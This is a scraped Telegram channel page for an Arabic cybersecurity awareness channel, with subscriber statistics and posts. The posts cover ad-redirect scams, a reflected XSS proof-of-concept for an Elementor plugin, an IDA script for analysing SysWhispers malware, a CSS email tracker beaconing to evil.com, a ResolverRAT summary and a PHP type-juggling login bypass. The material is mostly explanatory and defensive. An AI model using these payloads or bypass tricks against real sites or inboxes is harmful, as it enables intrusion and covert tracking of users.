Kali Linux
Open in Telegram
قناة بتكشف لك أحدث طرق النصب والثغرات الأمنية في عالم التكنولوجيا بنشرح لك ازاي تحمي نفسك من الهجمات الخبيثة ونفهمك التفاصيل التقنية ببساطة خليك معانا عشان تكون في أمان #الأمن_السيبراني #أمن_المعلومات #ثغرات_أمنية بوت التواصل @KaliLinux777_bot
Show more4 309
Subscribers
No data24 hours
+227 days
+5530 days
Data loading in progress...
Similar Channels
Tags Cloud
Incoming and Outgoing Mentions
---
---
---
---
---
---
Attracting Subscribers
December '25
December '25
+21
in 0 channels
November '25
+135
in 0 channels
Get PRO
October '25
+217
in 0 channels
Get PRO
September '25
+29
in 0 channels
Get PRO
August '25
+32
in 0 channels
Get PRO
July '25
+175
in 0 channels
Get PRO
June '25
+197
in 0 channels
Get PRO
May '25
+246
in 0 channels
Get PRO
April '25
+333
in 3 channels
Get PRO
March '25
+324
in 0 channels
Get PRO
February '25
+329
in 1 channels
Get PRO
January '25
+304
in 0 channels
Get PRO
December '24
+179
in 0 channels
Get PRO
November '24
+122
in 0 channels
Get PRO
October '24
+91
in 0 channels
Get PRO
September '24
+97
in 0 channels
Get PRO
August '24
+131
in 0 channels
Get PRO
July '24
+99
in 0 channels
Get PRO
June '24
+89
in 0 channels
Get PRO
May '24
+175
in 1 channels
Get PRO
April '24
+318
in 5 channels
Get PRO
March '24
+172
in 0 channels
Get PRO
February '24
+88
in 1 channels
Get PRO
January '24
+52
in 0 channels
Get PRO
December '23
+37
in 0 channels
Get PRO
November '23
+48
in 0 channels
Get PRO
October '23
+67
in 0 channels
Get PRO
September '23
+49
in 0 channels
Get PRO
August '23
+119
in 0 channels
Get PRO
July '23
+254
in 0 channels
Get PRO
June '23
+757
in 0 channels
Get PRO
May '23
+397
in 0 channels
Get PRO
April '23
+44
in 0 channels
Get PRO
March '23
+301
in 0 channels
| Date | Subscriber Growth | Mentions | Channels | |
| 03 December | +7 | |||
| 02 December | +11 | |||
| 01 December | +3 |
Channel Posts
| 2 | مشكلة الإعلانات اللي بتحولك على كذا موقع من غير ما تحس
لما تدوس على أي لينك مش دايمًا بتروح للصفحة اللي أنت عايزها على طول ساعات بعد ما تدوس بيحصل كذا تحويل أوتوماتيكي كده ورا بعض دي اسمها GET
تخيل كده إنك دوست على لينك في الأول بيوديك لشبكة إعلانات بتاخد فلوس على كل تحويلة
بعدها ممكن تتحول لوسيط إعلانات ده بقى اللي بيوزع الزوار على معلنين مختلفين
بعد كده ممكن تتفتح صفحة تانية خالص فيها برنامج بيعمل سكان لجهازك اللي داخل منه ومكانك فين وإيه اللي ممكن تكون مهتم بيه
بعد كل ده بقى بتوصل أخيرا للموقع اللي أنت عايزه وده ممكن يكون صفحة إعلان أو تطبيق أو كازينو أو حتى موقع نصب مضروب في كل خطوة من دول فيه واحد بياخد فلوس عشان حولك للخطوة اللي بعدها وأنت ولا حاسس بأي حاجة
ليه المواقع بتعمل كده؟
أصحاب المواقع بيستخدموا التحويلات دي (اللي بتدفع بالنقرة أو بالمشاهدة) عشان يكسبوا فلوس من الزوار المهم عندهم إن التحويلة تتحسب مش فارق معاهم أنت هتروح فين بعد كده
وسطاء الإعلانات بيشتروا عدد كبير من الزوار وبيحولوهم على العملاء بتوعهم المشكلة إن مفيش رقابة كافية على الصفحة اللي الزائر بيوصلها في الآخر
النصابين بيستغلوا شبكات الإعلانات اللي فيها ثغرات أو اللي مفيش عليها رقابة كويسة عشان يزرعوا برامج تحول الزوار على مواقع نصب أو تطبيقات ضارة أو محافظ عملات رقمية مضروبة وأي طريقة للنصب
شبكات إشعارات الموبايل والنوافذ المنبثقة بتشتغل بمبدأ دوسة واحدة = تحويلة واحدة وممكن توديك لأي حتة في الإنترنت من إعلانات جنسية لحد نصب عن طريق تغيير إعدادات الإنترنت
ليه صعب تكتشف الموضوع ده؟
سلسلة التحويلات دي بتكون متخفية ممكن تلاقي روابط مؤقتة أو بتستخدم طرق إخفاء أو أسماء المواقع بتتغير بسرعة وممكن يكون فيه 5 أو 6 خطوات وسيطة بينك وبين الصفحة الأخيرة
المتصفح بتاعك مش بيعرض لك كل الخطوات دي أنت بتشوف بس العنوان الأصلي والنهائي كل اللي في النص ده بيحصل في الخلفية من غير ما تحس
لو الموقع بيكسب فلوس مش من المحتوى اللي بيقدمه لأ ده بيكسب من إنه بيحول الزوار لأي مكان تاني فالموقع ده بيكون جزء من العالم المظلم للإنترنت حتى لو صاحبه مش واخد باله
التحويلات الإعلانية دي مش مجرد طريقة مزعجة لكسب الفلوس دي أداة عشان يستغلوا ثقتك
إيه الحل عشان تحمي نفسك؟
خش على إعدادات المتصفح بتاعك → الخصوصية → الإشعارات → وامسح الأذونات لأي مواقع مش مطمنلها
غير سيرفرات الـ DNS بتاعتك للآتي
9.9.9.9
94.140.15.15
https://dns.adguard.com/dns-query
نزل إضافات للمتصفح زي: AdGuard Browser Extension, ClearURLs, Web Address Cleaner
لما تدوس على أي لينك المفروض ده يكون قرارك أنت مش سيناريو حد تاني رسمهولك التحويلات الإعلانية دي مش مجرد إعلانات مزعجة، دي طريقة عشان يتحكموا في أفعالك من غير ما أنت تعرف
#أمن_المعلومات #الأمن_السيبراني
#Anonymous_Hack_504 #Cybersecurity | 0 |
| 3 | عندما تفكر في الاستسلام تذكر لماذا بدأت لا تتنازل على هدفك 👍 | 0 |
| 4 | كل عام وأنتم بخير! 🌙✨ عيد أضحى مبارك عليكم وعلى أحبابكم أعاده الله علينا وعليكم بالخير واليمن والبركات تقبل الله منا ومنكم صالح الأعمال | 0 |
| 5 | Burp Suite + Claude AI: إزاي توصلهم ببعض عن طريق ب MCP Server
لو عايز تزود إمكانيات Burp Suite بتاعتك وتخلي الذكاء الاصطناعي يساعدك ولو معندكش النسخة البرو من Burp بس نفسك تعمل حاجة جامدة ومختلفة بإصدار المجتمع المجاني يبقى الدليل ده معمول مخصوص عشانك هنا هنشرحلك خطوة بخطوة إزاي توصل Burp بـ Claude (مساعد أنثروبيك الذكي) باستخدام بروتوكول Model Context Protocol اللي هو (MCP) الطريقة دي بتخليك تعمل مهام قوية بمساعدة الذكاء الاصطناعي مباشرة من بيئة الاختبار بتاعتك تخيل كده إن الذكاء الاصطناعي هو اللي بيشغلك Burp بأوامر بسيطة منك حاجة كده خرافة صح؟ قبل ما ندخل في التفاصيل، تعالى نفهم الأول إيه هو الـ MCP ده وناخد فكرة عن البروتوكول ده
ملاحظة أنا جربت أستخدم BurpAI ولقيته ملوش أي لازمة بصراحة وده لعدة أسباب
خاصية Explain this بتستهلك 5 توكنات بس (في البداية بيدوك 10 آلاف توكن) بس الشرح بتاعه سطحي أوي ومفيهوش أي أمثلة أو أكواد توضح ليه الثغرة دي ممكن تظهر. يعني بصراحة قراية أي لينك في جوجل أحسن منه بكتير.
نسيت اسم الزرار إيه بالظبط بس هو بتاع تطوير الثغرة أو حاجة زي كده جربت على ثغرة XSS عادية في بارامتر GET اللي حصل إنه مطلعش كل الـ payload's اللي ممكن تشتغل مع إن عندهم XSS cheatsheet كبير أوي كان ممكن يجيب منه أمثلة الخلاصة إنه بيتهيأله ولسه بيخرف ومقدرش يوصل لحاجة زي ATO أو حتى سرقة الكوكيز هو آخره XSSات عادية أي عيل صغير بتاع سكريبتات يقدر يعملها وكل تطوير زي ده بيستهلك أكتر من 1000 توكن وده رقم كبير يعني يا دوب 8-10 مرات استخدام والتوكنات هتخلص ومش شايف أي لازمة إني أشتري توكنات أو أستخدمه أصلاً في الوقت الحالي
سؤال محيرني الصراحة هو Portswigger بيستخدم بيانات مشاريعنا عشان يدرب بيها الذكاء الاصطناعي بتاعه ولا إيه؟ رأيي إن آه وإيه اللي كان يمنعهم يعملوا كده قبل ما يدخلوا الذكاء الاصطناعي؟ ممكن يسموها جمع بيانات تليمتري وإحصائيات وخلاص وبكده تبقى متغطية تمامًا! إيه رأيكم أنتم في الموضوع ده؟
وي كمان في إيفنت من الإيفنتات سمعت حد بيقول إن Burp MCP ده حاجة جامدة، وإنه بيحل لابز Portswigger لوحده. بس أنا مش عاجبني موضوع إنه مبيرينيش هو حلها إزاي. أنت كل اللي بتشوفه في الآخر هو Congratulations! أنا شخصيًا مش عايز النتيجة بس، أنا عايز أشوف العملية كلها، ونفسي أعملها بنفسي بس ممكن بمساعدة أو تلميحات عن الثغرات أو تفاصيل عن الـ frameworks إيه رأيكم أنتم؟
#الأمن_السيبراني #أمن_المعلومات #برمجة
#AI #EthicalHacking #IncidentResponse #API_Security #CloudSecurity #VulnerabilityResearch #CyberSecurityExperts
#DevSecOps #ThreatHunting #RedTeam @Anonymous_Hack_504 | 0 |
| 6 | ⚠️ ثغرة XSS (انعكاسية) (CVE-2025-24752) في Essential Addons لـ Elementor
فيه ثغرة XSS انعكاسية خطيرة اتكشفت في بلاجن Essential Addons for Elementor المشهور (اللي متثبت على أكتر من 2 مليون موقع) الثغرة دي موجودة في GET-parameter اللي اسمه popup-selector المشكلة دي بسبب إن مفيش فحص كويس للمدخلات اللي بتيجي من المستخدم وده بيخلي أي مهاجم يقدر يشغل أكواد جافاسكريبت خبيثة في متصفح الضحية
الهجوم ده ممكن يحصل لو المهاجم بعت للضحية لينك معمول بطريقة معينة فيه كود خبيث لو الهجوم نجح المهاجم ممكن يسرق ملفات الكوكيز أو يعمل حاجات باسم المستخدم أو يحط محتوى خبيث في الموقع
مثال على الهجوم (Proof-of-Concept)
https://example.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1
الإصدارات اللي فيها الثغرة
كل الإصدارات اللي قبل 6.0.15
تم إصلاحها في الإصدار
6.0.15 (تم إضافة فلترة لـ popup-selector)
نصايح للحماية
حدث البلاجن فورًا للإصدار 6.0.15.
استخدم حلول WAF (Web Application Firewall) عشان تفلتر أكواد الـ XSS الخبيثة
قلل استخدام الـ GET-parameters في إعدادات السيرفر بتاعك
#الأمن_السيبراني | 0 |
| 7 | ⚠️ ثغرة XSS (انعكاسية) (CVE-2025-24752) في Essential Addons لـ Elementor
فيه ثغرة XSS انعكاسية خطيرة اتكشفت في بلاجن Essential Addons for Elementor المشهور (اللي متثبت على أكتر من 2 مليون موقع) الثغرة دي موجودة في GET-parameter اللي اسمه popup-selector المشكلة دي بسبب إن مفيش فحص كويس للمدخلات اللي بتيجي من المستخدم وده بيخلي أي مهاجم يقدر يشغل أكواد جافاسكريبت خبيثة في متصفح الضحية
الهجوم ده ممكن يحصل لو المهاجم بعت للضحية لينك معمول بطريقة معينة فيه كود خبيث لو الهجوم نجح المهاجم ممكن يسرق ملفات الكوكيز أو يعمل حاجات باسم المستخدم أو يحط محتوى خبيث في الموقع
مثال على الهجوم (Proof-of-Concept)
https://example.com/?popup-selector=<img_src=x_onerror=alert("chirag")>&eael-lostpassword=1
الإصدارات اللي فيها الثغرة
كل الإصدارات اللي قبل 6.0.15
تم إصلاحها في الإصدار
6.0.15 (تم إضافة فلترة لـ popup-selector)
نصايح للحماية
حدث البلاجن فورًا للإصدار 6.0.15.
استخدم حلول WAF (Web Application Firewall) عشان تفلتر أكواد الـ XSS الخبيثة
قلل استخدام الـ GET-parameters في إعدادات السيرفر بتاعك | 0 |
| 8 | حتى آخر طلقة
حتى آخر رمق
حتى آخر نَفَس
المقاومة لن تموت ، ننتصر أو تتحرر أرضنا
#HackerNews #قاوم | 0 |
| 9 | كود الاسكربت
import idaapi
import ida_ua
import ida_ida
import ida_name
def get_syscall_by_hash(hash: int) -> str:
syscall_id = idaapi.Appcall.SW2_GetSyscallNumber(hash).value
# Get function names
dn = ida_name.get_debug_names(
ida_ida.inf_get_min_ea(),
ida_ida.inf_get_max_ea())
for addr in dn:
# Look for functions with prefix ntdll_Zw - these are syscall wrappers
if "ntdll_Zw" in dn[addr]:
instruction_addr = addr + 3
# Disassemble the instruction
insn = idaapi.insn_t()
ida_ua.create_insn(instruction_addr)
idaapi.decode_insn(insn, instruction_addr)
# Compare the function number with what we're looking for
if syscall_id == insn.ops[1].value:
return dn[addr]
@Anonymous_Hack_504 | 0 |
| 10 | كود الاسكربت
import idaapi
import ida_ua
import ida_ida
import ida_name
def get_syscall_by_hash(hash: int) -> str:
syscall_id = idaapi.Appcall.SW2_GetSyscallNumber(hash).value
# Получаем имена функций
dn = ida_name.get_debug_names(
ida_ida.inf_get_min_ea(),
ida_ida.inf_get_max_ea())
for addr in dn:
# Ищем функцию с префиксом ntdll_Zw - это обёртки над syscall`ми
if "ntdll_Zw" in dn[addr]:
instruction_addr = addr + 3
# Дисассемблируем инструкцию
insn = idaapi.insn_t()
ida_ua.create_insn(instruction_addr)
idaapi.decode_insn(insn, instruction_addr)
# Сраниваем номер функции с тем, что мы ищем
if syscall_id == insn.ops[1].value:
return dn[addr]
@Anonymous_Hack_504 | 0 |
| 11 | الهاكر دخل في النظام
الهاكر عاوز يعمل حاجة وحشة
الهاكر بيستدعي وظايف ويندوز و
برنامج الحماية لقيه وبدأ يزعق
موقف مش مريح للي بيكتبوا الفيروسات إزاي بيتعاملوا مع الحاجات دي؟
طريقة من الطرق إنهم يستخدموا system calls بدل ما يستدعوا وظايف ويندوز العادية برامج الحماية بتكون عارفة توقف الاستدعاءات العادية لكن مش دايماً بتحس بالـsystem calls فبيستغلوا النقطة دي علشان يتخطوا الحماية
SysWhispers
ليه تعمل الsyscall بنفسك وانت في ناس عملته قبلك؟ أحسن حاجة تستخدم SysWhispers (الجزء التاني منه) النظام ده بيوفر طريقة سهلة لاستدعاء الsyscalls وبيهرشهم كمان
الفكرة تستدعي function اسمها SW2_GetSyscallNumber وتباصي لها الهاش بتاع الsyscall اللي عاوزه هترجعلك رقم الsyscall اللي تقدر تستدعيه بـsyscall الصورة رقم 1 بتوريك مثال لاستدعاء NtWriteVirtualMemory.
السؤال: الباحث اللي هيريفرس الكود ده إزاي هيعرف إيه الsyscall المستخدم؟
مش هتقدر تجيب الرقم مباشر علشان معمول له هاش ممكن تكتب سكربت يعمل نفس عملية الهاش (الهاش معمول بـXOR على اسم الfunction مع قيمة عشوائية) لكن في طريقة تانية تستخدم Appcall في IDA Pro (بيشتغل بس لو الجهاز في وضع debugging يفضل تشتغل على الفيروسات في virtual machine) علشان تستدعي SW2_GetSyscallNumber مباشر وتباصي لها الهاش هتجيب الرقم أسرع بكتير
قارن بين إنك تكتب سكربت كامل أو سطر واحد في بايثون
syscall_id = idaapi.Appcall.SW2_GetSyscallNumber(hash).value
وصلنا للرقم إزاي نعرف اسمه؟
ممكن تدور عليه في جدول أو تعمل عملية أوتوماتيك Appcall بيشتغل في وضع debugging فممكن تجيب أسماء الfunctions من الmodules اللي بتحمل وقت التشغيل أهم module هو ntdll.dll: فيه الwrapper functions بتاعت الsyscalls والأسماء بتاعتهم نفس أسماء الsyscalls
السكربت اللي بيعمل كده موجود تحت البوست الفكرة إن كل الwrapper functions شكله متشابه (زي ما موضح في الصورة رقم 2). قبل ما يستدعي الsyscall بيحطوا رقم الfunction في register EAX (الأمر التاني) ممكن ناخد الأمر التاني ونشوف الرقم ونقارنه بالرقم اللي عندنا ونطبع النتيجة (الصورة رقم 3)
بالطريقة البسيطة دي الباحث يقدر يوفر وقته لو لاقى malware باستخدام SysWhispers تاني تحذير السكربت ده هيعمل بس في وضع debugging فلو بتشتغل على حاجة مؤذية إشتغل في virtual machine. IDA بيشتغل مع كذا debugger لكن الكود ده اتبنى واتختبر مع WinDbg
هدفي في المقال ده التوعيه الامنيه فقط وانا غير مسؤول عن اي سوء استخدام او اي حاجه ضاره انا بخلي مسؤوليتي
#InfoSec #Hacking #BlueTeam #RedTeam #CyberSecurity #InfoSec
#أخبار_الأمن_السيبراني #الهاكر_الاخلاقي اخبار_الاختراق #الامن_السيبراني | 0 |
| 12 | No text... | 0 |
| 13 | فيه باحث أمن سيبراني شغال في شركة Mozilla اكتشف حاجات كده مستخبية في ChatGPT Sandbox بتاع OpenAI والحاجات دي ممكن تأثر على خصوصية البيانات لما الراجل ده عمل شوية اختبارات باستخدام أوامر Linux العادية جوه واجهة ChatGPT قدر يوصل لنظام الملفات بتاع الجهاز اللي ChatGPT شغال عليه وده كشف إن فيه إمكانية إنه يتلاعب بالملفات وممكن كمان ينفذ أوامر برمجية جوه البيئة المعزولة دي اللي اسمها Sandbox
#أمن_المعلومات #الأمن_السيبراني | 0 |
| 14 | يا جدعان بتوع الأمن السيبراني اتخضوا لما سمعوا خبر إن برنامج الثغرات الأمنية المعروف باسم CVE هيتقفل بس دلوقتي ممكن يهدوا أعصابهم شوية وكالة CISA دفعت بسرعة حوالي كام مليون دولار عشان برنامج MITRE يفضل شغال الوكالة دي اعترفت إن برنامج CVE مهم جداً لمجتمع الأمن السيبراني وإن ده من أولوياتها وعشان كده فعلوا بند في العقد عشان يضمنوا إن الخدمات المهمة بتاعة CVE متتوقفش وبيقولوا إن العقد ده اتجدد لمدة 11 شهر بس فيه حتة مهمة في الموضوع ده قبل ما CISA تقول الكلام ده بشوية مجموعة من أعضاء مجلس تحدد أعلنوا إنهم عملوا مؤسسة غير ربحية اسمها صندوق CVE عشان يضمنوا استقلالية برنامج CVE بعد ما MITRE حذرت إن التمويل هيقف وقالوا إن من الأسباب اللي خلتهم يعملوا كده إن برنامج CVE من ساعة ما اتعمل وهو شغال بفلوس الحكومة وده كان مخلي أعضاء المجلس قلقانين من ناحية حيادية المورد ده اللي العالم كله بيستخدمه وإنه معتمد بشكل كامل على قرارات الجهة اللي بتموله فدلوقتي صندوق CVE ده أكيد هيعلنوا عن تفاصيل أكتر بخصوص خططهم لاستراتيجية تطوير CVE الجديدة في الأيام اللي جاية بس مع تجديد عقد MITRE ممكن النوايا دي تتغير بس هنشوف إيه اللي هيحصل | 0 |
| 15 | يا جماعه فيه طريقة نصب جديدة الناس بتستخدمها عشان تبعت إيميلات نصب وتتجسس على الضحايا وبيستخدموا فيها أكواد CSS بدل الجافاسكريبت وده بيخلي الإيميلات دي تعدي من فلاتر الإيميل بسهولة
بص بقى الطريقة دي شغالة إزاي
الهاكرز بيحطوا كود CSS خبيث جوه إيميل HTML الكود ده بيعمل كام حاجة
بيخفي المحتوى بتاع النصب بيستخدموا خواص CSS زي text-indent -9999px و opacity 0 وحاجات تانية عشان يخفوا الكلام والصور اللي فيها النصب من عين المستخدم ومن فلاتر الإيميل اللي بتدور على الكلام الظاهر
بيتجسسوا على المستخدم عن طريق أكواد media زي media max-width 600px الكود ده بيتتبع تفاعل المستخدم مع الإيميل زي تغيير حجم الشاشة أو الضغط على أي حاجة وبيبعتوا البيانات دي للسيرفر بتاع الهاكرز
بيعدوا من فلاتر الإيميل عشان الإيميل مفيهوش جافاسكريبت فبيبقى شكله مش مريب بالنسبة للفلاتر اللي بتدور على الأكواد أو الملفات الضارة
ودي حتة كود عشان تفهم أكتر
<style>
.tracker { display: none; }
media (max-width: 600px) {
.tracker { display: block; background: url('http://evil.com/track?user=1'); }
}
</style>
<div class="tracker"></div>
الكود ده بيشتغل إزاي
لما حجم شاشة عرض الإيميل بيتغير زي لما تفتح الإيميل على الموبايل العناصر المخفية في CSS بتتفعل والعناصر دي بتبعت طلبات لمواقع خارجية على سيرفر الهاكرز وبكده بيعرفوا المستخدم عمل إيه
فيه شوية حاجات فنية لازم تعرفها
مبيستخدموش جافاسكريبت خالص كل الشغل بالـ HTML والـ CSS وده بيخلي الطريقة دي مبتتأثرش ببرامج حظر الإعلانات والأكواد
فلاتر الإيميل لسه مش قوية كفاية عشان تفهم أكواد CSS المعقدة دي ومفيش تحديثات نزلت لسه عشان تكشفها
فيه طرق كتير بيستخدموها عشان يخفوا الكلام غير text-indent و opacity ممكن يستخدموا position absolute مع إحداثيات بالسالب أو font-size 0 المهم إن الكلام ميبانش بس الكود بتاع التتبع يفضل شغال لما الإيميل يتفتح
إيه اللي المفروض مديري الشبكات يعملوه عشان يحموا نفسهم من طريقة النصب الجديدة دي
لازم يخلوا فلاتر الإيميل بتاعتهم تحلل أكواد CSS اللي في إيميلات الـ HTML بشكل أعمق ممكن يضيفوا قواعد جديدة لبرنامج SpamAssassin عشان يكشف أكواد media المشبوهة
يراقبوا حركة البيانات اللي طالعة من أجهزة المستخدمين ويدوروا على أي طلبات لمواقع غريبة من برامج الإيميل بالذات لو فيه طلبات لتحميل صور في الخلفية background url
يوّعوا المستخدمين ويشرحوا لهم خطورة الموضوع
لحد دلوقتي الموضوع مش منتشر أوي بس الطريقة دي بتعدي الحماية العادية بسهولة وممكن تبقى موضة جديدة في النصب الإلكتروني بالذات في الشركات
شكله كده هنرجع نقرا الإيميلات على برنامج lynx في التيرمينال أحسن
بس انا غير مسؤول عن سوء استخدام
#أمن_سيبراني #اختراق #هاكرز #نصب_إلكتروني #احتيال_إلكتروني #فيشينج #أمن_المعلومات
#تكنولوجيا_المعلومات #جرائم_إلكترونية | 0 |
| 16 | No text... | 0 |
| 17 | يا جدعان شركة مورفيسيك اكتشفت نوع جديد من البرامج الخبيثة المتطورة اسمه ResolverRAT وده بيستخدموه عشان يهاجموا مؤسسات الرعاية الصحية والأدوية
وبيعرف يشتغل جوه الذاكرة ويتخبى بطرق كتير وبيعتمد على إنه يحل حاجات في وقت التشغيل ويتعامل مع الموارد بشكل ديناميكي صحيح فيه شبه بين الطريقة اللي بيستخدموها في الإغراء والملفات اللي بيبعتوها عشان يوصلوا البرنامج الخبيث ده وبين حملات التصيد اللي كانت بتوصل برامج Rhadamanthys وLumma RATs قبل كده بس الباحثين شايفين إن ResolverRAT ده نوع جديد خالص من البرامج الخبيثة بس التشابه في طريقة توصيل البرنامج واستخدام حاجات قديمة ومواضيع الإغراء ممكن يدل على إن الناس اللي بتعمل الهجمات دي ممكن يكونوا بيستخدموا نفس البنية التحتية أو ممكن يكونوا شغالين مع بعض أو متفقين
الإيميلات اللي فيها نصب وبتروج للبرنامج الخبيث الجديد ده بتخلي موظفين الشركات يدوسوا على لينك بينزل ويفتح ملف هو اللي بيشغل ResolverRAT المهاجمين بيستهدفوا ناس في بلاد كتير وبيبعتوا الإيميلات بلغة أهل البلد زي التشيكية والهندية والإندونيسية والإيطالية والبرتغالية والتركية والسعوديه والكويت وغالباً بيقولوا إن فيه تحقيقات قانونية أو انتهاكات لحقوق النشر طريقة الإصابة بتبدأ بأنهم بيغيروا ترتيب البحث عن ملفات DLL وبيعتمدوا على ملف تنفيذي ضعيف عشان يحمل ملف DLL خبيث موجود معاه في نفس المكان
في أول مرحلة من التشغيل البرنامج اللي بيحمل البرنامج الخبيث بيستخدم طرق كتير عشان يمنع التحليل وبيفك تشفير الحمولة الخبيثة وبينزلها ويشغلها الحمولة بتاعة ResolverRAT بتكون مضغوطة ومحمية بتشفير AES-256 والمفاتيح بتكون متخزنة على إنها أرقام صحيحة مشفرة ومبتكونش موجودة غير في الذاكرة بعد ما تتفك
عشان البرنامج الخبيث يكمل شغل بيعمل حوالي 20 مدخل في التسجيل في أماكن كتير وبيخفي أسماء مفاتيح التسجيل ومسارات الملفات وبيثبت نفسه في أماكن كتير
كمان ResolverRAT بيستخدم طرق كتير عشان يأمن الاتصال بالخادم اللي بيتحكم فيه C2 ومن ضمنها نظام ثقة موازي عشان يتأكد من صحة الشهادة وده ممكن يخليه يتخطى سلطات التصديق الجذرية وده بيعمل سلسلة مغلقة من التحقق بين البرنامج اللي بيتزرع والجهاز اللي بيتحكم فيه
كمان بيستخدم نظام تغيير عناوين IP متطور عشان يكون عنده بدائل لو الجهاز اللي بيتحكم فيه مبقاش متاح وبيدعم بروتوكول اتصالات C2 خاص بيه بس بيستخدم منافذ قياسية عشان يستخبى في حركة المرور العادية وبيعمل الاتصالات على فترات عشوائية وبيعتمد على ProtoBuf عشان يرتب البيانات
ResolverRAT متقسم لكذا جزء عشان يقدر يتعامل مع الأوامر وبينفذ معالجة قوية للأخطاء عشان ميقفش وبيدعم الاتصال المستمر وبيقسم مجموعات البيانات الكبيرة لأجزاء عشان ينقلها شركة مورفيسيك بتقول إن تكوين C2 فيه خانات بتسمح للناس اللي بتشغله إنهم يتتبعوا الإصابات الفردية وينظموها في حملات وفي الحالة دي بيستخدموا رموز مصادقة خاصة لكل ضحية
#الأمن_السيبراني #برمجيات_خبيثة #هجمات_سيبرانية #أمن_المعلومات #بنية_تحتية #تشفير
#Anonymous_Hack_504 | 0 |
| 18 | Voice message | 0 |
| 19 | إيه المشكلة في الكود ده؟
ركز كويس في الكود اللي قدامك ده عرفت فيه أي ثغرة؟ الإجابة هتلاقيها مستخبية تحت دي 👇
<?php
$input = $_GET["password"];
$answer = json_decode($input);
//random 16 character token
$token = base64_encode(bin2hex(random_bytes(16)));
$password = $answer->password;
if ($password == $token) {
echo "Admin Panel";
} else {
echo "Error Encoutered! Wrong Token!<br>";
echo "Your token was: $token";
}
?>
ممكن نعدي التحقق من الهوية لو حطينا قيمة true بدل الباسورد أيوه والكود اللي قدامك ده بيوريك ازاي ده ممكن يحصل PHP عندها نظام أنواع بيانات ضعيف ولما بنستخدم علامه == مقارنة مش صارمة بيحصل تحويل تلقائي لأنواع البيانات وده ممكن يخلي فيه نتائج مش متوقعة لما نقارن أنواع بيانات مختلفة ببعض في الحالة دي، لو حد خبيث بعت JSON وقيمة مفتاح password فيه هي true المقارنة بين $password والتوكن اللي اتعمل هتنجح عادي المقارنة في السطر بتاع if ($password == $token) هتخلي التوكن يتحول لنوع boolean عشان المقارنة تتم وبما إن أي قيمة مش فاضية للتوكن لما تتحول لـ boolean هتبقى true الشرط هيتحقق صح وبكده ممكن نفوت التحقق من الهوية ونوصل لمصدر محمي
#الأمن_السيبراني #أمن_المعلومات #ويب #ثغرات_أمنية
#حماية_المواقع #اختبار_الاختراق #تحليل_الثغرات
#ssrf #php #xss #javascript #openredirect | 0 |
| 20 | No text... | 0 |
